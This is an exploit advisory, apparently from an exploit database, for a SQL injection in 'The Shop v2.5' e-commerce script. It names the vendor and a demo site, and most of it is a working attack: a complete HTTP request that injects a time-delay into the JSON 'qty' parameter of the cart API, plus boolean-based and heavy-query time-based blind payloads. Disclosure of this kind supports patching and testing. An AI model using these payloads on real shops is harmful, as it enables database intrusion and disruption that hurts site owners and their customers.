# Exploit Title: The Shop v2.5 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/the-shop/34858541
# Demo Site: https://shop.activeitzone.com
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /api/v1/carts/add HTTP/1.1
Content-Type: application/json
Accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
Referer: https://localhost
Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;
the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
Content-Length: 81
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}


### Parameter & Payloads ###

Parameter: JSON qty ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)
THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)
END))","temp_user_id":null}

    Type: time-based blind
    Title: MySQL > 5.0.12 OR time-based blind (heavy query)
    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR
2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS
C)","temp_user_id":null}